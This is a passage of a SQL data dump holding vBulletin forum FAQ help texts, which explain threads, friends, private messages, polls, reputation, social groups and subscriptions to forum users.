To start a new thread simply click on the \'new thread\' button \"Post (you may need the right permissions to do this).

\r\n\r\n

Threads can be ordered in many different ways. The default is to have the thread with the most recent activity at the top. But you can easily change this ordering, for example to have the thread with the most posts at the top, or the highest rating. Simply click on the appropriate column heading at the top of the list of threads (Thread, Thread Starter, Rating, Last Post, Replies or Views). You can also reverse the sorting order by clicking the arrow next to the name of the active option. (Note that \'sticky\' threads will always be at the top no matter how you change the viewing options).

\r\n\r\n

Multi-page views

\r\n\r\n

When there are more threads to display than will fit on a single page, you may see the \'Page\' box, which contains page numbers. This indicates that the list of threads has been split over two or more pages.

\r\n\r\n

This method of splitting lists of items over many pages is used throughout the board.

\r\n\r\n

What are sticky threads?

\r\n\r\n

\'Sticky\' threads are created by moderators or administrators (?), and remain \'stuck\' to the top of the listing, even if they haven\'t had any posts recently. Their purpose is to keep important information visible and accessible at all times.

\r\n\r\n

How do I read a thread?

\r\n\r\n

To read a thread, click on its title. Each post in a thread is created by a member or a guest. You\'ll see some brief information about the member who created the thread above the main post message. In some cases it will be to the side of the post.

\r\n\r\n

To post a reply to an existing thread, click on the \'Post Reply\' \"Reply button. If the \'Post Reply\' button does not appear, it could mean that you are not logged in as a member, or that you do not have permission to reply, or that the thread has been closed to new replies.

\r\n\r\n

If enabled, there will also be a \'Quick Reply\' box where you can quickly enter a reply without having to go to the \'Post Reply\' page. You may need to click the quick reply button \"Quick in a post to activate the quick reply box before you can type into it.

\r\n\r\n

On long threads you may want to change how the posts are ordered. For more on different ways to view and navigate threads, click (?).

\r\n\r\n

Is there a faster way to get to forums?

\r\n\r\n

If you know which forum you want to go to, you can use the \'Forum Jump\' control, which appears at the bottom of many pages within the board.

\r\n\r\n

How do I find out more about members?

\r\n\r\n

To view information about a particular member, click on the user name. This will take you to their public profile page (?).

\r\n\r\n

What is the Navigation Bar?

\r\n\r\n

The navigation bar at the top of every page has links to help you move around. A \'breadcrumb\' area at the top left shows where you are now. A form on the right allows you to quickly login. With one click you can reach areas such as: the User Control Panel (?), FAQ (which you are reading now), the Calendar (?), Search options (?) and Quick Links (?) to other useful features.

\r\n\r\n

What is the \'What\'s Going On?\' box on the board home page?

\r\n\r\n

On the board home page you\'ll see a section at the bottom that tells you what\'s going on at the moment. It tells you things like the number of registered users online, the number of guests, and even things like birthdays, and forthcoming events.

\r\n\r\n

Can I change the way the board looks?

\r\n\r\n

You may be able to change the styling of the board by using the style changer in the bottom left of the page. This lets you choose different skins which change the color scheme and appearance of the board. If this option does not appear, the board cannot be restyled.

', 'vbulletin', 'vBulletin Solutions', 1232372712, '3.8.1'), (35052, -1, 'vb3_friends_contacts', 'faqtext', '

What is the difference between a friend and a contact?

\r\n\r\n

A friendship is a mutual, two-way relationship between two users. It is initiated by one user and accepted by the other.

\r\n\r\n

A contact is a one-way friendship. This could be where the other person does not accept the friendship, a friendship request is pending, or you do not wish to be friends at this time but want to show them as a contact only.

\r\n\r\n

Where is list of friends and contacts displayed?

\r\n\r\n

Your friends and contacts are displayed on the \'Contacts and Friends\' page in your User CP. Your friends are also displayed in your profile page.

\r\n\r\n

How can I request a friend, accept a friend or break a friendship?

\r\n\r\n

There are two ways to request a friendship with someone.

\r\n\r\n

The easiest way is to view the profile page of the person you want to become friends with and click the \'Befriend\' link.

\r\n\r\n

The other way is to add the person to your contacts first. Then from your \'Contacts and Friends\' page ask to be their friend by checking the box next to their name labelled \'Friend\'. Next, save the page.

\r\n\r\n

If you know the username of the person you want to be friends with you can send a friend request using the box provided and clicking \'Add Friend\'.

\r\n\r\n

To accept a friend, go to your \'Contacts and Friends\' page. At the bottom of the page you will see a list of pending requests. Check the box for the requests you wish to accept then check the \'Accept\' button and save the changes. If you do not wish to be friends then select \'Reject\' instead.

\r\n\r\n

Breaking a friendship can be done in three ways.

\r\n\r\n
    \r\n
  • From your \'Contacts and Friends\' page, uncheck the box for friend for the particular person and save the changes. If you no longer wish them to be a contact either, uncheck both boxes for that person.
  • \r\n
  • In your \'Profile Page\', click \'Friends\' and then click \'Break Friendship\' next to the user\'s name.
  • \r\n
  • In the other person\'s profile, click \'Friends\' then find your username and click \'Break Friendship\'.
  • \r\n
', 'vbulletin', 'vBulletin Solutions', 1207146244, '3.7.0 Release Candidate 3'), (35053, -1, 'vb3_lost_passwords', 'faqtext', '

I forgot my password. What can I do?

\r\n\r\n

If you forget your password, you can click on the \'Forgotten Your Password\' link. This will appear on any page that requires you to fill in your password.

\r\n\r\n

This link brings up a page where you should enter your registered email address. An email will be sent to that address shortly, with instructions for resetting your password.

\r\n\r\n

Since passwords are encrypted, there is no way to resend your original password. This option provides you with the ability to reset your password.

\r\n\r\n

You must be able to receive emails to your registered email address for this to work. You may need to check your spam filters and folder if you do not see this email in a few minutes.

', 'vbulletin', 'vBulletin Solutions', 1204551494, '3.7.0 Beta 6'), (35054, -1, 'vb3_members_list', 'faqtext', '

What is the Members List?

\r\n\r\n

The members list shows the registered members of the board. Providing the administrator allows this, you can view the member list ordered alphabetically by username, by the date they joined, by the number of posts they have made or by reputation (?).

\r\n\r\n

To view the members list, click on \'Member List\' on main navigation bar at the top of the page.

\r\n\r\n

To quickly find a particular member, click on the \'Search Members\' link and type a username (or partial username) into the box. For further search options - including searching based on join date, post count or home page - click on \'Advanced Search\' on the search menu.

\r\n\r\n

Are all members listed?

\r\n\r\n

Some members may not be on the list. The administrator has options over who is shown on the list. They may, for example, omit members who have not made many posts or who belong to certain user groups.

', 'vbulletin', 'vBulletin Solutions', 1207905934, '3.7.0 Release Candidate 4'), (35055, -1, 'vb3_message_icons', 'faqtext', '

What are message icons?

\r\n\r\n

Message Icons, also known as Post Icons, are small icons that appear in the title of your post. If your post is the first in a thread, then they also display in the thread listings. If the board administrator has enabled these, they can be found below the message box on the \'New Post\' and \'New Thread\' pages. Simply select the icon that you wish to use and this will be displayed before your thread title.

\r\n\r\n

What are thread prefixes?

\r\n\r\n

Thread Prefixes can be used to further identify your thread as containing a particular content in the forum. If your administrator has enabled these, you will see a box before the title box which contains a menu with the available prefixes for you to choose from.

', 'vbulletin', 'vBulletin Solutions', 1204553702, '3.7.0 Beta 6'), (35056, -1, 'vb3_mods_admins', 'faqtext', '

What are moderators and administrators?

\r\n\r\n

Moderators oversee specific forums. They generally have the ability to edit and delete posts, move threads, and perform other actions. Becoming a moderator for a specific forum is usually rewarded to users who are particularly helpful and knowledgeable in the subject of the forum they are moderating.

\r\n\r\n

Administrators are the people who have overall control of everything that happens on the board. They oversee how the board is styled, what forums to create and how to organize them, what information to require from members and who to appoint as moderators.

', 'vbulletin', 'vBulletin Solutions', 1204559411, '3.7.0 Beta 6'), (35057, -1, 'vb3_new_posts', 'faqtext', '

How can I see the latest posts?

\r\n\r\n

There are two ways to quickly view recently created or updated threads.

\r\n\r\n

If you are not logged in, the \'today\'s posts\' link will show a list of all threads that have been created or updated in the last 24 hours.

\r\n\r\n

If you are logged in, the \'Today\'s Posts\' link will change to \'New Posts\', which gives you a listing of all threads that have been created or updated since your last visit.

\r\n\r\n

The administrator can also set up the forums so that each thread you read is marked in the database. If this option is set, then new threads (or threads with new posts) will not be marked as read until you have actually read them.

\r\n\r\n

There is a built-in time limit to this, however, that will automatically mark all threads as \'read\' after a set number of day, whether you really have read them or not. The default setting is 10 days, but the administrator could make this higher or lower.

', 'vbulletin', 'vBulletin Solutions', 1204557689, '3.7.0 Beta 6'), (35058, -1, 'vb3_notifications', 'faqtext', '

What are Your Notifications?

\r\n\r\n

When you have logged into the board, a link to \'Your Notifications\' may be displayed in the \'Welcome\' box near the top of the forum. \'Your Notifications\' will show if you have any one of the following:

\r\n\r\n
    \r\n
  • Unread Private Messages (?)
  • \r\n
  • Unread Profile Visitor Messages (?)
  • \r\n
  • Profile Visitor Messages Awaiting Approval
  • \r\n
  • Incoming Friend Requests (?)
  • \r\n
  • Requests to Join Your Social Groups (?)
  • \r\n
  • Invitations to Join Social Groups
  • \r\n
  • Unread Picture Comments (?)
  • \r\n
  • Picture Comments Awaiting Approval
  • \r\n
\r\n\r\n

By clicking on the \'Your Notifications\' link, you will be able to quickly see how many of each type you have received. Clicking on any of the links in the menu will take you to the relevant page within the User Control Panel or elsewhere in the system.

\r\n\r\n

If there are no notifications, then this link will be replaced by a link to \'Private Messages\' (?).

', 'vbulletin', 'vBulletin Solutions', 1207905976, '3.7.0 Release Candidate 4'), (35059, -1, 'vb3_other_settings', 'faqtext', '

What do the other settings do?

\r\n\r\n

In your User CP, there is a section under Settings & Options named \'Edit Options\'.

\r\n\r\n
    \r\n
  • Login & Privacy: set your\r\n
      \r\n
    • \'Invisible Mode\' - sets whether or not other members can see if you are online and what page you are viewing
    • \r\n
    • \'Show Reputation Level\' - shows your reputation level on posts if this option is enabled by the administrator
    • \r\n
    • \'Allow vCard Download\' - sets whether or not to allow other members to download a vCard containing your email address and username.
    • \r\n
    \r\n
  • \r\n \r\n
  • Messaging & Notification - options include:\r\n
      \r\n
    • \'Receive Email\' - whether or not you want to receive emails from other Members and administrators
    • \r\n
    • \'Default Thread Subscription Mode\' - how you want to be notified about new posts in threads to which you have subscribed
    • \r\n
    • \'Private Messaging\' - control how you want Private Messaging to work for your account
    • \r\n
    • \'Visitor Messaging\' - control how you want Visitor Messaging to work for your account
    • \r\n
    \r\n
  • \r\n \r\n
  • Thread Display Options - these include:\r\n
      \r\n
    • \'Visible Post Elements\' - whether or not you want to be able to see Signatures, Avatars and Images in posts
    • \r\n
    • \'Thread Display Mode\' - how you want to view threads by default (more info available here)
    • \r\n
    • \'Number of Posts to Show Per Page\'
    • \r\n
    • \'Default Thread Age Cut Off\' - the time period for threads to be displayed - threads older than this age will be hidden
    • \r\n
    \r\n
  • \r\n \r\n
  • Date & Time Options - these include:\r\n
      \r\n
    • \'Time Zone\' - your local geographical time zone offset from GMT/UTC
    • \r\n
    • \'Start of the Week\' - for the Calendar.
    • \r\n
    \r\n
  • \r\n \r\n
  • Miscellaneous Options include:\r\n
      \r\n
    • \'Message Editor Interface\' - This option allows you choose what kind of editor you will use when posting messages. Your choices include a basic text-only editor, a standard editor with clickable formatting controls, or a full WYSIWYG (what you see is what you get) editor that will show your formatting as you type.
    • \r\n
    • \'Forum Style\' - only available if there is more than one style (or \'skin\') available and the administrator has enabled this selection
    • \r\n
    • \'Forum Language\' - only available if there is more than one Language enabled. This will change the language in which all controls and board messages will be shown. It will not translate members\' posts
    • \r\n
    \r\n
  • \r\n
', 'vbulletin', 'vBulletin Solutions', 1208778628, '3.7.0 Release Candidate 4'), (35060, -1, 'vb3_polls', 'faqtext', '

You may notice that some threads on this forum also include a section where you can vote on an issue or question. These threads are called \'polls\'.

\r\n\r\n

How do I create a new poll?

\r\n\r\n

When you post a new thread, you may also have the option to create a poll.

\r\n\r\n

This allows you to ask a question and specify a number of possible responses. Other members will then be able to vote for the response they wish, and the results of the voting will be displayed in the thread.

\r\n\r\n

An example poll might be:

\r\n\r\n

What is your favorite color?

\r\n\r\n
    \r\n
  • Red
  • \r\n
  • Blue
  • \r\n
  • Yellow
  • \r\n
  • Green
  • \r\n
  • Sky-blue
  • \r\n
  • Pink with yellow spots
  • \r\n
\r\n\r\n

To create a poll when you post a new thread, simply click the \'Yes, post a poll with this thread\' checkbox at the bottom of the page, and set the number of possible responses you want to include.

\r\n\r\n

When you click the submit button, you will be taken to the poll creation page, where you can specify the question and the list of responses you want to include.

\r\n\r\n

You may also want to specify a time limit for the poll, so that (for example) it stays open for voting for only a week.

\r\n\r\n

How do I vote in a poll and view the results?

\r\n\r\n

To vote in a poll, simply select which option you want to vote for, and click the \'Vote!\' button. Sometime you can choose more than one option. You can see the current results for a poll before you vote by clicking the \'View Results\' link. Voting in a poll is entirely optional. You may vote for any of the available options, or cast no vote at all.

\r\n\r\n

Note whether or not a poll is a public poll. If it is, any votes you cast will be attributable to you.

\r\n\r\n

Generally, once you have voted in a poll, you will not be able to change your vote later, so place your vote carefully!

', 'vbulletin', 'vBulletin Solutions', 1204552685, '3.7.0 Beta 6'), (35061, -1, 'vb3_posting', 'faqtext', '

How do I format my posts and messages?

\r\n\r\n

When posting messages you may wish to include some formatting such as bold text, italic text and underlined text.

\r\n\r\n

Adding formatting to your post can be done in two ways:

\r\n\r\n
    \r\n
  • Using clickable controls similar to those found in most word processors
  • \r\n
  • Typing formatting commands in BB code
  • \r\n
\r\n\r\n

Clickable controls are available in the Standard and Enhanced WYSIWYG (What You See Is What You Get) editors. The difference between these is that the standard editor will show the BB code in your message and be processed when it is displayed. The enhanced WYSIWYG editor will show your message as it will be displayed while you are typing.

\r\n\r\n

To use these, simply click the button, for example the B (bold) button and then type to get bold text. Click the button again to stop using that formatting. You can also highlight text that you have already typed then click the formatting button to format existing text.

\r\n\r\n

BB code is a special set of codes similar to HTML that can be used in posts to the board. To see the full list of BB code tags that can be used on this site and examples of their use, click here.

', 'vbulletin', 'vBulletin Solutions', 1206965663, '3.7.0 Release Candidate 2'), (35062, -1, 'vb3_private_messages', 'faqtext', '

If the administrator has enabled the Private Messaging system, registered members may send each other private messages.

\r\n\r\n

How do I send Private Messages?

\r\n\r\n

Private messages work a little like email, but are limited to registered members of this forum. You may be able to include BB code, smilies and images in private messages that you send.

\r\n\r\n

You may send a private message to a member of this forum by clicking the \'Send A Private Message\' link in the private messaging section of your user control panel (more info), or by clicking the \'Send a Private Message\' link in the drop down menu that appears in a member\'s posts when you click on their username.

\r\n\r\n

When you send a message, you have the option to save a copy of it in your \'Sent Items\' folder.

\r\n\r\n

How do I work with Private Message Folders?

\r\n\r\n

By default, you will have two folders in your private message area. These are the \'Inbox\' and the \'Sent\' Items folders.

\r\n\r\n

The \'Inbox\' folder contains any new messages you receive. It allows you to view all the messages you have received, along with the name of the person who sent it, and the date and time it was sent.

\r\n\r\n

The \'Sent Items\' folder contains a copy of any messages that you have sent, where you have specified that you wish to keep a copy for future reference.

\r\n\r\n

You can create additional folders for your messages by clicking the \'Edit Folders\' link.

\r\n\r\n

Each folder has a set of message controls which allow you to select messages, then either move them to one of your custom folders, or delete them. Once you have selected your messages, you can choose the following options in the \'Selected Messages\' box at the bottom of the list:

\r\n\r\n
    \r\n
  • Move to Folder
  • \r\n
  • Delete
  • \r\n
  • Mark as Read
  • \r\n
  • Mark as Unread
  • \r\n
  • Download as XML
  • \r\n
  • Download as CSV
  • \r\n
  • Download as TEXT
  • \r\n
\r\n\r\n

You will need to periodically delete old messages, as the administrator has probably set a limit to the number of private messages you can have in your folders. If you exceed this number, you will not be able to send or receive new messages until you delete some old ones.

\r\n\r\n

If you would like to keep a record of your messages before you delete them, you can use any of the \'Download as..\' options listed above to take a copy and store them on your own computer.

\r\n\r\n

Whenever you read a message, you will have the option to reply or forward it to another member of the forum. You may also have the ability to forward that message to multiple members of your contact list.

\r\n\r\n

How do I track messages?

\r\n\r\n

When you send a new private message, you may have the option to request a read-receipt. This lets you check whether or not a message has been read by its recipient. To do this, go to the \'Message Tracking\' page.

\r\n\r\n

This page is divided into two sections: unread and read messages.

\r\n\r\n

The unread messages section shows all messages that you have sent with a read-receipt request, that have not yet been read by their recipient.

\r\n\r\n

The read messages section shows all messages you have sent with a receipt request that have been read and acknowledged by their recipient. The time that the message was read is also shown.

\r\n\r\n

You may choose to end the tracking on any message you choose by selecting it and clicking the \'End Tracking\' button.

\r\n\r\n

When you receive a message with a read-receipt request, you may have the option to read the message while denying the read-receipt request. To do this, simply click the \'Deny Receipt\' link rather than the title of the message, if it appears.

', 'vbulletin', 'vBulletin Solutions', 1232372783, '3.8.1'), (35063, -1, 'vb3_profile_custom', 'faqtext', '

How do I customize my profile page?

\r\n\r\n

You may be able to edit the design and styling of your public profile page (if this is enabled by the board administrator) via the \'Customize Profile\' section within the User CP. You can adjust the color scheme, fonts, borders and layout of elements on the page.

\r\n\r\n

You can also use images as background for various sections of you profile. First you will need to upload the background images to an album you have created (?). Background images can be sourced only from albums defined as public, or \'profile\' type. Images in private albums cannot be used.

', 'vbulletin', 'vBulletin Solutions', 1232372827, '3.8.1'), (35064, -1, 'vb3_public_profile', 'faqtext', '

What is the Public Profile Page?

\r\n\r\n

Every member has a publicly viewable profile page. This page includes information provided by the member, either during the registration process or later on via the User Control Panel.

\r\n\r\n

There are a number of ways to view a member\'s profile. Whenever you see a member\'s name, clicking on it will usually take you to view their profile page.

\r\n\r\n

The members list allows you to browse all registered members, and quickly click through to public profiles.

\r\n\r\n

When logged in, you can also view your own public profile by logging into the forums and clicking on your username shown in the header at the top of the page.

\r\n\r\n

You can also go straight to a profile if you know the username of the member by typing in the following into your web browser: http://www.example.com/member.php?username=<username of the member>

\r\n\r\n

What\'s on the Public Profile Page?

\r\n\r\n

The public profile lists information about the member under the \'About Me\' tab. It also includes statistical information, such as the number of posts they have made and their registration date. This information is shown under the \'Statistics\' tab.

\r\n\r\n

Other information includes a list of Friends (?), their profile picture (if set by the member), and a list of members who have recently visited the profile page.

\r\n\r\n

A list of the members\' albums (?) and social group (?) memberships are also shown.

\r\n\r\n

What are Visitor Messages?

\r\n\r\n

Visitor messages are publicly viewable messages posted on member profile pages. To post a message, click on the \'Visitor messages\' tab, and use the form at the top of the section. You will only be able to use certain formatting in these messages, as described underneath the edit box. This message will be viewable by all visitors to this profile, including guest users and search engine robots if the administrator has allowed this. To communicate privately with a member, send a Private Message instead.

\r\n\r\n

Visitor messages can be edited or deleted by site moderators or the member who owns the profile. If you see a visitor message that is not appropriate, you can alert the moderators by clicking on the \'Report\' link. The \'View Conversation\' link allows you to view all visitor messages between the member and the owner of the profile.

', 'vbulletin', 'vBulletin Solutions', 1232372889, '3.8.1'), (35065, -1, 'vb3_quick_links', 'faqtext', '

What is the Quick Links menu?

\r\n\r\n

The navigation bar at the top of each page has several helpful links. One of them is a dropdown menu called Quick Links. (It appears only to registered members who are logged in). Clicking it once with the mouse will make it drop down and show the following options:

\r\n\r\n
    \r\n
  • Quick Links\r\n
      \r\n
    • Today\'s Posts (shows posts created in the past 24 hours)
    • \r\n
    • Mark Forums Read (marks all the threads and posts as read for your session - this is a shortcut alternative to actually reading the threads and posts)
    • \r\n
    • Open Contacts Popup (opens a new window with a list of all your contacts)
    • \r\n
    \r\n
  • \r\n \r\n
  • Networking\r\n
      \r\n
    • Contacts and Friends (a page from where you can manage your contacts and friends)
    • \r\n
    • Social Groups (where you can manage your social groups)
    • \r\n
    • Pictures and Albums (where you can manage your pictures and albums)
    • \r\n
    \r\n
  • \r\n \r\n
  • User Control Panel (clicking this takes you to your personal user control panel)\r\n
      \r\n
    • Edit Signature (edit your personal signature that appears below posts)
    • \r\n
    • Edit Your Details (edit your personal profile details)
    • \r\n
    • Edit Options (manage your community settings)
    • \r\n
    \r\n
  • \r\n \r\n
  • Miscellaneous\r\n
      \r\n
    • Private Messages (manage your private messages, read your inbox, create new messages, etc)
    • \r\n
    • Subscribed Threads (get an overview of your free subscriptions and options to manage them)
    • \r\n
    • Your Profile (loads your social profile)
    • \r\n
    • Who\'s Online (see which users who are currently online on the board and what they are doing)
    • \r\n
    \r\n
  • \r\n
', 'vbulletin', 'vBulletin Solutions', 1207917146, '3.7.0 Release Candidate 4'), (35066, -1, 'vb3_rating_threads', 'faqtext', '

What are ratings?

\r\n\r\n

The forums allow you to rate threads between 1 star (terrible) and 5 stars (excellent). Once enough votes are cast for a thread, stars will appear next to its name in the listings. These show the average vote, and can be an easy way to see which threads are worth reading if you are on a busy forum.

\r\n\r\n

On the forum viewing page you can also arrange threads by rating, with either the highest or lowest at the top.

\r\n\r\n

It therefore makes sense to rate threads because it helps all users. To do this, click on the \'rate thread\' link at the top of the thread viewing page. Choose the number of stars you feel best represents the quality of the thread. You may or may not be able to change your choice of rating at a later date.

', 'vbulletin', 'vBulletin Solutions', 1204551428, '3.7.0 Beta 6'), (35067, -1, 'vb3_reading_posting', 'faqtext', '', 'vbulletin', 'vBulletin Solutions', 1204552547, '3.7.0 Beta 6'), (35068, -1, 'vb3_register', 'faqtext', '

The administrator will probably require you to register in order to use all the features of the forum. Being registered gives you an identity on the board, a fixed username on all messages you post and an online public profile.

\r\n\r\n

Registration is free (unless otherwise specified), and offers an extended range of features, including:

\r\n\r\n
    \r\n
  • Posting new threads
  • \r\n
  • Replying to other peoples\' threads
  • \r\n
  • Editing your posts
  • \r\n
  • Receiving email notification of replies to posts and threads you specify
  • \r\n
  • Sending private messages to other members
  • \r\n
  • Creating albums of pictures and comment on others\' pictures
  • \r\n
  • Adding events to the forum calendar
  • \r\n
  • Setting up a \'contact list\' to quickly see which of your friends are online.
  • \r\n
\r\n\r\n

How do I register?

\r\n\r\n

You register by clicking on the \'Register\' link near the top of the page. You will be asked to choose a user name, password and enter a valid email address. In addition there will be some other fields to which you will be invited to respond. Some will be mandatory while others are optional. Once this is complete you will either be fully registered, or in some cases you may have to click on a link in an \'activation email\' sent to your email address. Once you have done this you will be registered.

\r\n\r\n

Note that entering your email address will not leave you open to \'spam\', as you can choose to hide it from other board users. You\'ll probably be able to allow other registered users to contact you via email, but the system won\'t display your email address to them unless you give permission.

\r\n\r\n

If you are under the age of 13, the administrator may require that a parent or guardian provide consent before allowing you to complete the registration process. More information about this is available during the registration process.

', 'vbulletin', 'vBulletin Solutions', 1233227232, '3.8.2'), (35069, -1, 'vb3_replying', 'faqtext', '

On some boards you might be able to post and reply as a guest user. But most communities require registration.

\r\n\r\n

As a registered user you can go to a forum on a board where you have permission to view threads and leave replies. To reply you have a few options. You can click on the \'Post Reply\' button \"Post and add a new post to the end of the thread. Alternatively, you can leave a quick reply in a quick editor box listed below the posts in the thread.

\r\n\r\n

When using \'Quick Reply\' you can choose to quote a particular post if you are replying to something someone wrote. You may need to click the quick reply button \"Quick in a post to activate the quick reply box before you can type into it.

\r\n\r\n

If you want to post replies to multiple posts you can select them by clicking the multi quote button \"Multi. This button will change to indicate that you\'ve selected it. Clicking post reply will then bring you to the full editor with all the posts quoted.

', 'vbulletin', 'vBulletin Solutions', 1208717872, '3.7.0 Release Candidate 4'), (35070, -1, 'vb3_reputation', 'faqtext', '

What is reputation?

\r\n\r\n

Reputation is a way of rating users depending on the quality of their posts. If the administrators have enabled reputation, then the reputation icon will be visible in posts.

\r\n\r\n

Reputation may be positive \"Positive , negative \"Negative or neutral \"Neutral. Negative reputation may only be given if the administrator has enabled this. Neutral reputation is only given when the person giving reputation does not meet the criteria set by the administrator to affect someone else\'s reputation.

\r\n\r\n

How do I give reputation?

\r\n\r\n

To give reputation, click on the reputation icon in the relevant post. This will reveal a form to complete with the reputation type and the reason for giving the reputation. If negative reputation is disabled then it will not be displayed in this form. You may not give reputation for the same post twice.

\r\n\r\n

How do I know what reputation I have received?

\r\n\r\n

You can view the reputation that you have received in your User CP (User Control Panel) where it is displayed at the bottom of the User CP page. Here you will see the latest reputation that you have received and whether this is positive, negative or neutral. Your total reputation will be shown as series of reputation indicators in your posts and profile. The more positive your reputation, the more positive icons will be shown. The more negative your reputation the more negative icons will be shown.

\r\n\r\n

How much reputation is given? What is reputation power?

\r\n\r\n

If the administrator has enabled this, the amount of reputation that each user will give (or take away if negative) is shown in the user\'s posts as \'Reputation Power\'. The value of the reputation power is determined by the administrator and may increase over time depending on the settings they have applied.

\r\n\r\n

What if I don\'t want anyone to see my reputation?

\r\n\r\n

You can disable the display of your reputation by going to your User CP and selecting Edit Options. On this page you will find a check box labelled \'Show Your Reputation Level\'. Un-checking this box will remove the display of your reputation and replace it with the Reputation Disabled icon. You can still give and receive reputation while your reputation display is disabled.

', 'vbulletin', 'vBulletin Solutions', 1207146368, '3.7.0 Release Candidate 3'), (35071, -1, 'vb3_rss_podcasting', 'faqtext', '

Can I use RSS to keep up with new posts?

\r\n\r\n

If the administrator has enabled RSS syndication, this lets you view newly created threads in guest-viewable forums without visiting the board.

\r\n\r\n

The feeds are currently provided in two formats, RSS and RSS v2.

\r\n\r\n

Most modern browsers have facilities for reading RSS feeds and will automatically detect the availability of feeds on bulletin board pages.

\r\n\r\n

How do I listen to podcasts?

\r\n\r\n

A podcast is a means of distributing audio files (such as .mp3s) over the internet. They can be played on a wide range of media players and computers. If the board administrator has enabled this function, then you may sometimes see links to podcasts within threads.

\r\n\r\n

Podcasts contained within threads are only accessible using RSS feeds.

', 'vbulletin', 'vBulletin Solutions', 1204557897, '3.7.0 Beta 6'), (35072, -1, 'vb3_search', 'faqtext', '

How do I search for something?

\r\n\r\n

To quickly find a thread or post of interest anywhere on the bulletin board, click on the \'Search\' link in the navigation bar at the top of most forum pages. Then, type in the keyword or phrase you wish to search for, and select either \'Show Threads\' or \'Show Posts\' to view the results. By selecting posts, you will be shown only the actual post in which the search word appears.

\r\n\r\n

For more control over the search, select \'Advanced Search\' from the drop-down box. The advanced search page allows you to restrict your search to individual forums, find posts or threads by user, or return results based on tags (?). There are also options to find posts from a certain date, or threads with a certain number of replies.

\r\n\r\n

How do I search a specific forum or thread?

\r\n\r\n

If you are browsing a forum, you can quickly search for a thread or post within it by clicking on the \'Search this forum\' link near the top of the page (it\'s above the list of threads). You can also search for individual posts within a thread by clicking on the \'Search this Thread\' link at the top of any thread view page.

', 'vbulletin', 'vBulletin Solutions', 1232372928, '3.8.1'), (35073, -1, 'vb3_signatures_avatars', 'faqtext', '

What are signatures?

\r\n\r\n

\'Signatures\' contain information that you want to include at the bottom of all your posts. This might include pictures, links to your site(s), quotes, etc.

\r\n\r\n

What are avatars?

\r\n\r\n

Avatars are small images that people use to identify or distinguish themselves to other forum members. In some cases the administrator will not allow avatars or only allow them for specific members. The administrator can also provide some stock avatars people can use, or they can allow members to upload their own custom avatars from their own computers. These avatars will be displayed as part of the user info in posts, as well as in the public profile.

\r\n\r\n

For more information about avatars, please click here.

\r\n\r\n

What are profile pictures?

\r\n\r\n

Profile Pictures are photos members can upload that will display in their public member profile. This option may or may not be enabled by the administrator.

\r\n\r\n

How do I set signatures, avatars and profile pictures?

\r\n\r\n

You can set and change your signature, avatar and profile picture in the User Control Panel (providing the administrator has made these options available).

\r\n\r\n

For signatures, click on \'Edit Signature\' under the \'Settings and Options\' area of the navigation bar within the User CP.

\r\n\r\n

To select an existing or upload a new avatar, click on \'Edit Avatar\'.

\r\n\r\n

To upload a profile picture, click on \'Edit Profile Picture\' in the \'Your Profile\' section.

', 'vbulletin', 'vBulletin Solutions', 1204553831, '3.7.0 Beta 6'), (35074, -1, 'vb3_smilies', 'faqtext', '

What are smilies?

\r\n\r\n

Smilies are icons that can be used in your posts to express emotions or feelings. You might wish to use these to show that you are happy, sad, joking, or embarrassed. For example, if you are telling a joke or being sarcastic you may wish to add a wink instead of writing \'this is a joke\'.

\r\n\r\n

The basic smilies are the same as what you would find on any instant messenger system. They are made up of a combination of characters which often show the basis of the resulting image. For example, :) is converted to a smiley face and :( to a sad face or frown. Tilt your head to the left to see this in action as these consist of two eyes and a mouth either smiling or frowning.

\r\n\r\n

How do I add smilies?

\r\n\r\n

Some smilies can be accessed from the \'New Post\' or \'New Thread\' pages if your administrator has enabled this function. Clicking them will automatically insert them into your message. You can also type the character combinations for the smilies directly. A full list of the smilies and their character combinations used on this forum can be found here.

\r\n\r\n

On occasions, you may want to prevent the text in your message being converted into smilies. You will see a checkbox which you can select when you make a new post, which will allow you to \'Disable Smilies\'.

', 'vbulletin', 'vBulletin Solutions', 1207905787, '3.7.0 Release Candidate 4'), (35075, -1, 'vb3_social_groups', 'faqtext', '

What is a social group?

\r\n\r\n

A social group is a group of people usually with a particular interest or something else in common. It provides a way of communicating between members as well as sharing photos or other images.

\r\n\r\n

You can get to the list through \'Group Memberships\' section on your public profile (?).

\r\n\r\n

The Social Groups list page displays all groups that have been created. You can list the groups by the number of members, messages or pictures, the group name, when the group was created or by the date of the most recent message posted. You can use the controls provided to search for a group.

\r\n\r\n

How do I join a group?

\r\n\r\n

To join a group, click the group title then click \'Join Group\'. When you have joined a group, its name will be shown in your public profile. You must be a logged-in, registered member to join groups.

\r\n\r\n

Can I create my own social group?

\r\n\r\n

As a registered member, you can create your own social group (providing the administrator allows this). Go to the groups page and click \'Create A New Group\'. Complete the title and description for your group then select the type. There are three types of groups:

\r\n\r\n
    \r\n
  • Public - open to everyone. There is no restriction on who can join or who can post messages to it
  • \r\n
  • Invite Only - require an invitation to be sent to join them. Invitations can only be sent by the group creator or forum moderators and administrators. Invitations are sent by clicking \'Pending & Invited Members\' at the bottom of the page for that individual group
  • \r\n
  • Moderated - open to everyone to join but messages need to be moderated before they will appear. They are moderated by the group creator and the site moderators and administrators
  • \r\n
', 'vbulletin', 'vBulletin Solutions', 1232372947, '3.8.1'), (35076, -1, 'vb3_subscriptions', 'faqtext', '

What are subscriptions?

\r\n\r\n

Subscriptions are a way of keeping track of different threads or forums. You can choose how you are notified about updates - for example by having them listed in your User CP and receiving email updates for each one.

\r\n\r\n

How do I subscribe to a thread or forum?

\r\n\r\n

To subscribe to a forum, click the \'Forum Tools\' link above the list of threads then select \'Subscribe to Forum\'. You will then have the option to choose the subscription mode for this forum. If the forum that you are subscribing to has any child forums (forums within a forum) then your subscription will be extended to these automatically.

\r\n\r\n

To subscribe to a thread, click the \'Thread Tools\' link at the top of the list of posts then click \'Subscribe to Thread\'. You can then choose the subscription mode that you wish to use for that thread.

\r\n\r\n

What subscription modes are available?

\r\n\r\n

There are a number of different forum subscription modes available.

\r\n\r\n
    \r\n
  • No Email Notification - lists the subscription in your User CP only. You do not receive any notifications about new posts or threads in the forum.
  • \r\n
  • Daily Email Notification - sends one email a day with the new and updated threads in the forum and any sub-forums. If there are no new or updated threads in the forum or its sub-forums then you will not receive an email.
  • \r\n
  • Weekly Email Notification - sends one email per week in the same way as the Daily Email Notification.
  • \r\n
\r\n\r\n

Thread Subscriptions have the same options as forum subscriptions with the following additional option:

\r\n\r\n
    \r\n
